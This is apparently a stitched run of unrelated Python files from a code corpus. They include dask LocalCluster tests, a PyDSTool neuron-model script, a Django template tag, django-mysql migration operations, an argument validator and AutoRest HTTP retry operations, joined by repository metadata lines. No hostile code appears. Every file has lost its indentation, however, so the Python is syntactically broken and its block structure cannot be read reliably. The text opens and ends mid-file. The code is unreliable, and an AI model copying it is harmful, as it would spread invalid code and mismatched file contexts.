processes=False,
n_workers=2,
scheduler_port=0,
silence_logs=False,
dashboard_address=None,
memory_limit=500,
asynchronous=True,
) as c:
assert [w.memory_limit for w in c.workers.values()] == [500] * 2
@pytest.mark.asyncio
async def test_memory_limit_none(cleanup):
async with LocalCluster(
n_workers=2,
scheduler_port=0,
silence_logs=False,
processes=False,
dashboard_address=None,
memory_limit=None,
asynchronous=True,
) as c:
w = c.workers[0]
assert type(w.data) is dict
assert w.memory_limit is None
def test_cleanup():
with clean(threads=False):
c = LocalCluster(
2, scheduler_port=0, silence_logs=False, dashboard_address=None
)
port = c.scheduler.port
c.close()
c2 = LocalCluster(
2, scheduler_port=port, silence_logs=False, dashboard_address=None
)
c2.close()
def test_repeated():
with clean(threads=False):
with LocalCluster(
0, scheduler_port=8448, silence_logs=False, dashboard_address=None
) as c:
pass
with LocalCluster(
0, scheduler_port=8448, silence_logs=False, dashboard_address=None
) as c:
pass
@pytest.mark.parametrize("processes", [True, False])
def test_bokeh(loop, processes):
pytest.importorskip("bokeh")
requests = pytest.importorskip("requests")
with LocalCluster(
n_workers=0,
scheduler_port=0,
silence_logs=False,
loop=loop,
processes=processes,
dashboard_address=0,
) as c:
bokeh_port = c.scheduler.http_server.port
url = "http://127.0.0.1:%d/status/" % bokeh_port
start = time()
while True:
response = requests.get(url)
if response.ok:
break
assert time() < start + 20
sleep(0.01)
# 'localhost' also works
response = requests.get("http://localhost:%d/status/" % bokeh_port)
assert response.ok
with pytest.raises(requests.RequestException):
requests.get(url, timeout=0.2)
def test_blocks_until_full(loop):
with Client(loop=loop) as c:
assert len(c.nthreads()) > 0
@pytest.mark.asyncio
async def test_scale_up_and_down():
async with LocalCluster(
0,
scheduler_port=0,
processes=False,
silence_logs=False,
dashboard_address=None,
asynchronous=True,
) as cluster:
async with Client(cluster, asynchronous=True) as c:
assert not cluster.workers
cluster.scale(2)
await cluster
assert len(cluster.workers) == 2
assert len(cluster.scheduler.nthreads) == 2
cluster.scale(1)
await cluster
assert len(cluster.workers) == 1
@pytest.mark.xfail(
sys.version_info >= (3, 8) and LooseVersion(tornado.version) < "6.0.3",
reason="Known issue with Python 3.8 and Tornado < 6.0.3. "
"See https://github.com/tornadoweb/tornado/pull/2683.",
strict=True,
)
def test_silent_startup():
code = """if 1:
from time import sleep
from distributed import LocalCluster
if __name__ == "__main__":
with LocalCluster(1, dashboard_address=None, scheduler_port=0):
sleep(.1)
"""
out = subprocess.check_output(
[sys.executable, "-Wi", "-c", code], stderr=subprocess.STDOUT
)
out = out.decode()
try:
assert not out
except AssertionError:
print("=== Cluster stdout / stderr ===")
print(out)
raise
def test_only_local_access(loop):
with LocalCluster(
0, scheduler_port=0, silence_logs=False, dashboard_address=None, loop=loop
) as c:
sync(loop, assert_can_connect_locally_4, c.scheduler.port)
def test_remote_access(loop):
with LocalCluster(
0,
scheduler_port=0,
silence_logs=False,
dashboard_address=None,
host="",
loop=loop,
) as c:
sync(loop, assert_can_connect_from_everywhere_4_6, c.scheduler.port)
@pytest.mark.parametrize("n_workers", [None, 3])
def test_memory(loop, n_workers):
with LocalCluster(
n_workers=n_workers,
scheduler_port=0,
processes=False,
silence_logs=False,
dashboard_address=None,
loop=loop,
) as cluster:
assert sum(w.memory_limit for w in cluster.workers.values()) <= MEMORY_LIMIT
@pytest.mark.parametrize("n_workers", [None, 3])
def test_memory_nanny(loop, n_workers):
with LocalCluster(
n_workers=n_workers,
scheduler_port=0,
processes=True,
silence_logs=False,
dashboard_address=None,
loop=loop,
) as cluster:
with Client(cluster.scheduler_address, loop=loop) as c:
info = c.scheduler_info()
assert (
sum(w["memory_limit"] for w in info["workers"].values()) <= MEMORY_LIMIT
)
def test_death_timeout_raises(loop):
with pytest.raises(TimeoutError):
with LocalCluster(
scheduler_port=0,
silence_logs=False,
death_timeout=1e-10,
dashboard_address=None,
loop=loop,
) as cluster:
pass
LocalCluster._instances.clear() # ignore test hygiene checks
@pytest.mark.asyncio
async def test_bokeh_kwargs(cleanup):
pytest.importorskip("bokeh")
async with LocalCluster(
n_workers=0,
scheduler_port=0,
silence_logs=False,
dashboard_address=0,
asynchronous=True,
scheduler_kwargs={"http_prefix": "/foo"},
) as c:
client = AsyncHTTPClient()
response = await client.fetch(
"http://localhost:{}/foo/status".format(c.scheduler.http_server.port)
)
assert "bokeh" in response.body.decode()
def test_io_loop_periodic_callbacks(loop):
with LocalCluster(
loop=loop, port=0, dashboard_address=None, silence_logs=False
) as cluster:
assert cluster.scheduler.loop is loop
for pc in cluster.scheduler.periodic_callbacks.values():
assert pc.io_loop is loop
for worker in cluster.workers.values():
for pc in worker.periodic_callbacks.values():
assert pc.io_loop is loop
def test_logging():
"""
Workers and scheduler have logs even when silenced
"""
with LocalCluster(1, processes=False, dashboard_address=None) as c:
assert c.scheduler._deque_handler.deque
assert c.workers[0]._deque_handler.deque
def test_ipywidgets(loop):
ipywidgets = pytest.importorskip("ipywidgets")
with LocalCluster(
n_workers=0,
scheduler_port=0,
silence_logs=False,
loop=loop,
dashboard_address=False,
processes=False,
) as cluster:
cluster._ipython_display_()
box = cluster._cached_widget
assert isinstance(box, ipywidgets.Widget)
def test_no_ipywidgets(loop, monkeypatch):
from unittest.mock import MagicMock
mock_display = MagicMock()
monkeypatch.setitem(sys.modules, "ipywidgets", None)
monkeypatch.setitem(sys.modules, "IPython.display", mock_display)
with LocalCluster(
n_workers=0,
scheduler_port=0,
silence_logs=False,
loop=loop,
dashboard_address=False,
processes=False,
) as cluster:
cluster._ipython_display_()
args, kwargs = mock_display.display.call_args
res = args[0]
assert kwargs == {"raw": True}
assert isinstance(res, dict)
assert "text/plain" in res
assert "text/html" in res
def test_scale(loop):
""" Directly calling scale both up and down works as expected """
with LocalCluster(
scheduler_port=0,
silence_logs=False,
loop=loop,
dashboard_address=False,
processes=False,
n_workers=0,
) as cluster:
assert not cluster.scheduler.workers
cluster.scale(3)
start = time()
while len(cluster.scheduler.workers) != 3:
sleep(0.01)
assert time() < start + 5, len(cluster.scheduler.workers)
sleep(0.2) # let workers settle # TODO: remove need for this
cluster.scale(2)
start = time()
while len(cluster.scheduler.workers) != 2:
sleep(0.01)
assert time() < start + 5, len(cluster.scheduler.workers)
def test_adapt(loop):
with LocalCluster(
scheduler_port=0,
silence_logs=False,
loop=loop,
dashboard_address=False,
processes=False,
n_workers=0,
) as cluster:
cluster.adapt(minimum=0, maximum=2, interval="10ms")
assert cluster._adaptive.minimum == 0
assert cluster._adaptive.maximum == 2
ref = weakref.ref(cluster._adaptive)
cluster.adapt(minimum=1, maximum=2, interval="10ms")
assert cluster._adaptive.minimum == 1
gc.collect()
# the old Adaptive class sticks around, not sure why
# start = time()
# while ref():
# sleep(0.01)
# gc.collect()
# assert time() < start + 5
start = time()
while len(cluster.scheduler.workers) != 1:
sleep(0.01)
assert time() < start + 5
def test_adapt_then_manual(loop):
""" We can revert from adaptive, back to manual """
with LocalCluster(
scheduler_port=0,
silence_logs=False,
loop=loop,
dashboard_address=False,
processes=False,
n_workers=8,
) as cluster:
sleep(0.1)
cluster.adapt(minimum=0, maximum=4, interval="10ms")
start = time()
while cluster.scheduler.workers or cluster.workers:
sleep(0.1)
assert time() < start + 5
assert not cluster.workers
with Client(cluster) as client:
futures = client.map(slowinc, range(1000), delay=0.1)
sleep(0.2)
cluster._adaptive.stop()
sleep(0.2)
cluster.scale(2)
start = time()
while len(cluster.scheduler.workers) != 2:
sleep(0.1)
assert time() < start + 5
@pytest.mark.parametrize("temporary", [True, False])
def test_local_tls(loop, temporary):
if temporary:
pytest.importorskip("cryptography")
security = True
else:
security = tls_only_security()
with LocalCluster(
n_workers=0,
scheduler_port=8786,
silence_logs=False,
security=security,
dashboard_address=False,
host="tls://0.0.0.0",
loop=loop,
) as c:
sync(
loop,
assert_can_connect_from_everywhere_4,
c.scheduler.port,
protocol="tls",
timeout=3,
**c.security.get_connection_args("client"),
)
        # If we connect to a TLS LocalCluster without TLS credentials, the connection should fail
sync(
loop,
assert_cannot_connect,
addr="tcp://127.0.0.1:%d" % c.scheduler.port,
exception_class=RuntimeError,
**c.security.get_connection_args("client"),
)
@gen_test()
async def test_scale_retires_workers():
class MyCluster(LocalCluster):
def scale_down(self, *args, **kwargs):
pass
loop = IOLoop.current()
cluster = await MyCluster(
0,
scheduler_port=0,
processes=False,
silence_logs=False,
dashboard_address=None,
loop=loop,
asynchronous=True,
)
c = await Client(cluster, asynchronous=True)
assert not cluster.workers
await cluster.scale(2)
start = time()
while len(cluster.scheduler.workers) != 2:
await asyncio.sleep(0.01)
assert time() < start + 3
await cluster.scale(1)
start = time()
while len(cluster.scheduler.workers) != 1:
await asyncio.sleep(0.01)
assert time() < start + 3
await c.close()
await cluster.close()
def test_local_tls_restart(loop):
from distributed.utils_test import tls_only_security
security = tls_only_security()
with LocalCluster(
n_workers=1,
scheduler_port=8786,
silence_logs=False,
security=security,
dashboard_address=False,
host="tls://0.0.0.0",
loop=loop,
) as c:
with Client(c.scheduler.address, loop=loop, security=security) as client:
workers_before = set(client.scheduler_info()["workers"])
assert client.submit(inc, 1).result() == 2
client.restart()
workers_after = set(client.scheduler_info()["workers"])
assert client.submit(inc, 2).result() == 3
assert workers_before != workers_after
def test_default_process_thread_breakdown():
assert nprocesses_nthreads(1) == (1, 1)
assert nprocesses_nthreads(4) == (4, 1)
assert nprocesses_nthreads(5) == (5, 1)
assert nprocesses_nthreads(8) == (4, 2)
assert nprocesses_nthreads(12) in ((6, 2), (4, 3))
assert nprocesses_nthreads(20) == (5, 4)
assert nprocesses_nthreads(24) in ((6, 4), (8, 3))
assert nprocesses_nthreads(32) == (8, 4)
assert nprocesses_nthreads(40) in ((8, 5), (10, 4))
assert nprocesses_nthreads(80) in ((10, 8), (16, 5))
def test_asynchronous_property(loop):
with LocalCluster(
4,
scheduler_port=0,
processes=False,
silence_logs=False,
dashboard_address=None,
loop=loop,
) as cluster:
async def _():
assert cluster.asynchronous
cluster.sync(_)
def test_protocol_inproc(loop):
with LocalCluster(protocol="inproc://", loop=loop, processes=False) as cluster:
assert cluster.scheduler.address.startswith("inproc://")
def test_protocol_tcp(loop):
with LocalCluster(
protocol="tcp", loop=loop, n_workers=0, processes=False
) as cluster:
assert cluster.scheduler.address.startswith("tcp://")
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
def test_protocol_ip(loop):
with LocalCluster(
host="tcp://127.0.0.2", loop=loop, n_workers=0, processes=False
) as cluster:
assert cluster.scheduler.address.startswith("tcp://127.0.0.2")
class MyWorker(Worker):
pass
def test_worker_class_worker(loop):
with LocalCluster(
n_workers=2,
loop=loop,
worker_class=MyWorker,
processes=False,
scheduler_port=0,
dashboard_address=None,
) as cluster:
assert all(isinstance(w, MyWorker) for w in cluster.workers.values())
def test_worker_class_nanny(loop):
class MyNanny(Nanny):
pass
with LocalCluster(
n_workers=2,
loop=loop,
worker_class=MyNanny,
scheduler_port=0,
dashboard_address=None,
) as cluster:
assert all(isinstance(w, MyNanny) for w in cluster.workers.values())
@pytest.mark.asyncio
async def test_worker_class_nanny_async(cleanup):
class MyNanny(Nanny):
pass
async with LocalCluster(
n_workers=2,
worker_class=MyNanny,
scheduler_port=0,
dashboard_address=None,
asynchronous=True,
) as cluster:
assert all(isinstance(w, MyNanny) for w in cluster.workers.values())
def test_starts_up_sync(loop):
cluster = LocalCluster(
n_workers=2,
loop=loop,
processes=False,
scheduler_port=0,
dashboard_address=None,
)
try:
assert len(cluster.scheduler.workers) == 2
finally:
cluster.close()
def test_dont_select_closed_worker():
# Make sure distributed does not try to reuse a client from a
# closed cluster (https://github.com/dask/distributed/issues/2840).
with clean(threads=False):
cluster = LocalCluster(n_workers=0)
c = Client(cluster)
cluster.scale(2)
assert c == get_client()
c.close()
cluster.close()
cluster2 = LocalCluster(n_workers=0)
c2 = Client(cluster2)
cluster2.scale(2)
current_client = get_client()
assert c2 == current_client
cluster2.close()
c2.close()
def test_client_cluster_synchronous(loop):
with clean(threads=False):
with Client(loop=loop, processes=False) as c:
assert not c.asynchronous
assert not c.cluster.asynchronous
@pytest.mark.asyncio
async def test_scale_memory_cores(cleanup):
async with LocalCluster(
n_workers=0,
processes=False,
threads_per_worker=2,
memory_limit="2GB",
asynchronous=True,
) as cluster:
cluster.scale(cores=4)
assert len(cluster.worker_spec) == 2
cluster.scale(memory="6GB")
assert len(cluster.worker_spec) == 3
cluster.scale(cores=1)
assert len(cluster.worker_spec) == 1
cluster.scale(memory="7GB")
assert len(cluster.worker_spec) == 4
@pytest.mark.asyncio
async def test_repr(cleanup):
async with LocalCluster(
n_workers=2,
processes=False,
threads_per_worker=2,
memory_limit="2GB",
asynchronous=True,
) as cluster:
text = repr(cluster)
assert "workers=2" in text
assert cluster.scheduler_address in text
assert "cores=4" in text or "threads=4" in text
assert "GB" in text and "4" in text
async with LocalCluster(
n_workers=2, processes=False, memory_limit=None, asynchronous=True
) as cluster:
assert "memory" not in repr(cluster)
@pytest.mark.asyncio
@pytest.mark.parametrize("temporary", [True, False])
async def test_capture_security(cleanup, temporary):
if temporary:
pytest.importorskip("cryptography")
security = True
else:
security = tls_only_security()
async with LocalCluster(
n_workers=0,
silence_logs=False,
security=security,
asynchronous=True,
dashboard_address=False,
host="tls://0.0.0.0",
) as cluster:
async with Client(cluster, asynchronous=True) as client:
assert client.security == cluster.security
@pytest.mark.asyncio
@pytest.mark.skipif(
sys.version_info < (3, 7), reason="asyncio.all_tasks not implemented"
)
async def test_no_dangling_asyncio_tasks(cleanup):
start = asyncio.all_tasks()
async with LocalCluster(asynchronous=True, processes=False):
await asyncio.sleep(0.01)
tasks = asyncio.all_tasks()
assert tasks == start
@pytest.mark.asyncio
async def test_async_with():
async with LocalCluster(processes=False, asynchronous=True) as cluster:
w = cluster.workers
assert w
assert not w
| blaze/distributed | distributed/deploy/tests/test_local.py | Python | bsd-3-clause | 29,495 | 0.000712 |
"""
Human cortical neuron using A-current model in reduced, 2D version of Hodgkin-Huxley model
Section 9.5
"""
from __future__ import division
from PyDSTool import *
from PyDSTool.Toolbox.phaseplane import *
from common_lib import *
import Ch9_HH_red
import Ch9_HH
gentype='vode' # dopri, euler, etc.
# Parameter An = noise amplitude
# As = sine wave amplitude
# f = frequency, should be >= 50 Hz
par_args = {'tau_v': 1, 'tau_r': 5.6,
'As': 0, 'f': 700, 'An': 0., 'Iapp': 0.8}
ic_args = {'v':-0.8, 'r': 0.25}
def test_I(gen, Iapp, tmax=300, silent=False):
    gen.set(pars={'Iapp': Iapp},
tdata=[0,tmax])
traj = gen.compute('test')
pts = traj.sample()
f = freq(traj)
if not silent:
plt.clf()
plt.plot(pts['t'], pts['v'], 'b')
plt.ylim([-0.85, 0.4])
print "Frequency response was:", f
return f
# original version
HH = Ch9_HH.makeHHneuron('HH', par_args, ic_args, const_I=True,
gentype=gentype)
# 2D reduced version
HHred = Ch9_HH_red.makeHHneuron('HHred', par_args, ic_args, const_I=True,
gentype=gentype)
# vary Iapp up to 2
# 0.791 is the closest to the saddle-node bif point to 3 decimal places
test_I(HHred, 0.791, 500)
plt.show()
| robclewley/compneuro | Ch9_HH_compare.py | Python | bsd-3-clause | 1,267 | 0.007893 |
from django import template
from filemanager.models import fileobject
from django.shortcuts import get_object_or_404, render_to_response
from django.template.loader import render_to_string
from django.contrib.contenttypes.models import ContentType
register = template.Library()
def raw_text(context):
project=context['object']
object_type = ContentType.objects.get_for_model(project)
projectfiles = fileobject.objects.filter(content_type=object_type,object_id=project.id, filetype="text")
textlist = ""
for i in projectfiles:
textlist = textlist+i.filename.read()
return textlist
register.simple_tag(takes_context=True)(raw_text)
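# Template usage sketch (assumes the rendering context carries the project as
# ``object``; the load name follows this module's filename):
#   {% load addSearchContext %}
#   {% raw_text %}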
| Rhombik/rhombik-object-repository | searchsettings/templatetags/addSearchContext.py | Python | agpl-3.0 | 669 | 0.014948 |
from __future__ import annotations
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
from django.db.migrations.operations.base import Operation
from django.db.migrations.state import ModelState
from django.utils.functional import cached_property
class InstallPlugin(Operation):
reduces_to_sql = False
reversible = True
def __init__(self, name: str, soname: str) -> None:
self.name = name
self.soname = soname
def state_forwards(self, app_label: str, state: ModelState) -> None:
pass # pragma: no cover
def database_forwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_st: ModelState,
to_st: ModelState,
) -> None:
if not self.plugin_installed(schema_editor):
schema_editor.execute(
f"INSTALL PLUGIN {self.name} SONAME %s", (self.soname,)
)
def database_backwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_st: ModelState,
to_st: ModelState,
) -> None:
if self.plugin_installed(schema_editor):
schema_editor.execute("UNINSTALL PLUGIN %s" % self.name)
def plugin_installed(self, schema_editor: BaseDatabaseSchemaEditor) -> bool:
with schema_editor.connection.cursor() as cursor:
cursor.execute(
"""SELECT COUNT(*)
FROM INFORMATION_SCHEMA.PLUGINS
WHERE PLUGIN_NAME LIKE %s""",
(self.name,),
)
count = cursor.fetchone()[0]
return count > 0
def describe(self) -> str:
return f"Installs plugin {self.name} from {self.soname}"
class InstallSOName(Operation):
reduces_to_sql = True
reversible = True
def __init__(self, soname: str) -> None:
self.soname = soname
def state_forwards(self, app_label: str, state: ModelState) -> None:
pass # pragma: no cover
def database_forwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_st: ModelState,
to_st: ModelState,
) -> None:
schema_editor.execute("INSTALL SONAME %s", (self.soname,))
def database_backwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_st: ModelState,
to_st: ModelState,
) -> None:
schema_editor.execute("UNINSTALL SONAME %s", (self.soname,))
def describe(self) -> str:
return "Installs library %s" % (self.soname)
class AlterStorageEngine(Operation):
def __init__(
self, name: str, to_engine: str, from_engine: str | None = None
) -> None:
self.name = name
self.engine = to_engine
self.from_engine = from_engine
@property
def reversible(self) -> bool:
return self.from_engine is not None
def state_forwards(self, app_label: str, state: ModelState) -> None:
pass
def database_forwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_state: ModelState,
to_state: ModelState,
) -> None:
self._change_engine(app_label, schema_editor, to_state, engine=self.engine)
def database_backwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_state: ModelState,
to_state: ModelState,
) -> None:
if self.from_engine is None:
raise NotImplementedError("You cannot reverse this operation")
self._change_engine(app_label, schema_editor, to_state, engine=self.from_engine)
def _change_engine(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
to_state: ModelState,
engine: str,
) -> None:
new_model = to_state.apps.get_model(app_label, self.name)
qn = schema_editor.connection.ops.quote_name
if self.allow_migrate_model( # pragma: no branch
schema_editor.connection.alias, new_model
):
with schema_editor.connection.cursor() as cursor:
cursor.execute(
"""SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME = %s AND
ENGINE = %s""",
(new_model._meta.db_table, engine),
)
uses_engine_already = cursor.fetchone()[0] > 0
if uses_engine_already:
return
schema_editor.execute(
"ALTER TABLE {table} ENGINE={engine}".format(
table=qn(new_model._meta.db_table),
engine=engine,
)
)
@cached_property
def name_lower(self) -> str:
return self.name.lower()
def references_model(self, name: str, app_label: str | None = None) -> bool:
return name.lower() == self.name_lower
def describe(self) -> str:
if self.from_engine:
from_clause = f" from {self.from_engine}"
else:
from_clause = ""
return "Alter storage engine for {model}{from_clause} to {engine}".format(
model=self.name, from_clause=from_clause, engine=self.engine
)
| adamchainz/django-mysql | src/django_mysql/operations.py | Python | mit | 5,386 | 0.000928 |
OPEN = "mate-open"
FILE_MANAGER = "caja"
| hanya/BookmarksMenu | pythonpath/bookmarks/env/mate.py | Python | apache-2.0 | 42 | 0 |
#!/usr/bin/python2.7
print "__init__"
# __all__ = ['p2']
from big import *
| qrsforever/workspace | python/learn/base/module/l1/pack/__init__.py | Python | mit | 78 | 0.012821 |
PROJECT_DEFAULTS = 'Project Defaults'
PATHS = 'Paths'
_from_config = {
'author': None,
'email': None,
'license': None,
'language': None,
'type': None,
'parent': None,
'vcs': None,
'footprints': None
}
_from_args = {
'name': None,
'author': None,
'email': None,
'license': None,
'language': None,
'type': None,
'parent': None,
'vcs': None,
'footprint': None
}
def load_args(args):
from_args = _from_args.copy()
keys = _from_args.keys()
for key in keys:
if args.__contains__(key):
from_args[key] = args.__getattribute__(key)
return from_args
def load_config(config):
from_config = _from_config.copy()
keys = _from_config.keys()
if config:
if config.has_section(PROJECT_DEFAULTS):
for key in keys:
if config.has_option(PROJECT_DEFAULTS, key):
from_config[key] = config.get(PROJECT_DEFAULTS, key)
if config.has_section(PATHS):
for key in keys:
if config.has_option(PATHS, key):
from_config[key] = config.get(PATHS, key)
return from_config
def merge_configged_argged(configged, argged):
merged = configged.copy()
for key in argged.keys():
if True in [key == k for k in configged.keys()]:
# We only care about a None val if the key exists in configged
            # this will overwrite the config so that args take precedence
if argged[key] is not None:
merged[key] = argged[key]
else:
# If the key is not already here, then it must be 'footprint', in
# which case we definitely want to include it since that is our
# highest priority and requires less args to generate a project
merged[key] = argged[key]
return merged
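# Worked example: configged {'author': 'Ann', 'license': 'MIT'} merged with
# argged {'author': None, 'license': 'GPL', 'footprint': 'web'} yields
# {'author': 'Ann', 'license': 'GPL', 'footprint': 'web'} -- args win when set,
# and 'footprint' is carried over even though the config never defines it.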
def footprint_requires(merged):
required = ['name', 'parent']
passed = 0
pass_requires = len(required)
for r in required:
if r in merged.keys():
if merged[r] is not None:
passed += 1
return passed == pass_requires
def solo_args_requires(args):
required = ['name', 'parent', 'language', 'type']
passed = 0
pass_requires = len(required)
for r in required:
if r in args.keys():
if args[r] is not None:
passed += 1
return passed == pass_requires
def validate_args(args, config):
if config is not None:
configged = load_config(config)
argged = load_args(args)
merged = merge_configged_argged(configged, argged)
# If footprint is provided, we only need name and parent
if merged['footprint'] is not None:
return footprint_requires(merged), merged
# If no footprint, we need name, parent, language, and type to perform
# footprint lookups
if None not in [merged['name'], merged['parent'], merged['language'],
merged['type']]:
return True, merged
return False, merged
argged = load_args(args)
return solo_args_requires(argged), argged
| shaggytwodope/progeny | validators.py | Python | gpl-3.0 | 3,149 | 0 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from .. import models
class HttpRetry(object):
"""HttpRetry operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def head408(
self, custom_headers=None, raw=False, **operation_config):
"""
Return 408 status code, then 200 after retry
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/408'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.head(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
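    # Usage sketch (hypothetical service-client wiring; attribute name assumed):
    #
    #     client.http_retry.head408()   # server replies 408 first; the retry
    #                                   # policy re-issues until it sees a 200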
def put500(
self, boolean_value=None, custom_headers=None, raw=False, **operation_config):
"""
Return 500 status code, then 200 after retry
:param boolean_value: Simple boolean value true
:type boolean_value: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/500'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if boolean_value is not None:
body_content = self._serialize.body(boolean_value, 'bool')
else:
body_content = None
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def patch500(
self, boolean_value=None, custom_headers=None, raw=False, **operation_config):
"""
Return 500 status code, then 200 after retry
:param boolean_value: Simple boolean value true
:type boolean_value: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/500'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if boolean_value is not None:
body_content = self._serialize.body(boolean_value, 'bool')
else:
body_content = None
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def get502(
self, custom_headers=None, raw=False, **operation_config):
"""
Return 502 status code, then 200 after retry
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/502'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def post503(
self, boolean_value=None, custom_headers=None, raw=False, **operation_config):
"""
Return 503 status code, then 200 after retry
:param boolean_value: Simple boolean value true
:type boolean_value: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/503'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if boolean_value is not None:
body_content = self._serialize.body(boolean_value, 'bool')
else:
body_content = None
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete503(
self, boolean_value=None, custom_headers=None, raw=False, **operation_config):
"""
Return 503 status code, then 200 after retry
:param boolean_value: Simple boolean value true
:type boolean_value: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/503'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if boolean_value is not None:
body_content = self._serialize.body(boolean_value, 'bool')
else:
body_content = None
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def put504(
self, boolean_value=None, custom_headers=None, raw=False, **operation_config):
"""
Return 504 status code, then 200 after retry
:param boolean_value: Simple boolean value true
:type boolean_value: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/504'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if boolean_value is not None:
body_content = self._serialize.body(boolean_value, 'bool')
else:
body_content = None
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def patch504(
self, boolean_value=None, custom_headers=None, raw=False, **operation_config):
"""
Return 504 status code, then 200 after retry
:param boolean_value: Simple boolean value true
:type boolean_value: bool
